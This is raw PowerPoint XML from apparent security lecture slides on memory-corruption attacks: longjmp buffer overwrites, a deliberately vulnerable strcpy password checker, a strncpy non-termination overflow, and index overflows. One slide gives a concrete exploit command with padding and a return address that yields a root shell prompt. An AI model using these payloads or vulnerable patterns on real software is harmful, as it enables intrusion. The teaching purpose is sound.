              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37340334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Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="8839200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103876" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>jmp_buf Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103877" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) -&gt;</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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>                    /* return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> */</a:t>
            </a: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[JB_BP], %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  /* restore base </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> */</a:t>
            </a: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[JB_SP], %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  /* restore stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>jmp</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[JB_PC])      /* jump to stored PC */</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10312706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4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designing an Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1105925" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a long jump buffer can be overwritten by attacker-specified data, it is possible to modify the control flow of an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The exploit requires:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjmp(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An overflow attack that overwrites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>env</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set  target PC value to start of shell code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set stored BP and SP so that shell code has legal memory area for stack operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A call to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, x)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that modern implementation of this mechanism use pointer encryption to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meaningful manipulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13194259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Make sure that sensitive data structures cannot be overwritten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29190620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8" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How is Overwritten: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Carefully (?) Developed Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201159" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>checkpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(char *p)                                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>{                                                                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mypwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[512];                                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mypwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, p); /* creates copy of the password */                   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  /* Performs the check on the copy... */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("Checking password %s\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mypwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return 0;                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}                                                                                                                                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> main (</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char username[512];                                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char password[512];                                                                                                                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(password, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[1], 512);                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(username, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[2], 512);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("Checking password %s for user %s\n", password, username);      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>checkpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333881939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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Non-terminated String Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1200131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some functions, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, limit the amount of data copied in the destination buffer but do not include a terminating zero when the limit is reached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If adjacent buffers are not null-terminated it is possible to cause the copying of an excessive amount of information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>checkpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> `python -c 'print "A" * 512'` \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>               `python -c 'print "AAAAAAAAAAAA\x70\xf4\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>"'` </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39339712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Always make sure that strings are null-terminated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6143731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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Index Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149955" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This type of overflow exploits the lack of boundary checks in the value used to index an array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They are particularly easy to exploit because they allow for the direct assignment of memory values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that depending on the type of array it is possible to modify only memory values that conform to the data structure in the array</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42750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Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078F3B52-3D96-70C8-FCCD-783E0D9EEB7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371717" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31D52CA1-7903-F7CF-3E56-01AA4B7BE394}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3753890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Users are identified by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Username  (mark), UID (514)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Group name (engineering), GID (103)</a:t>
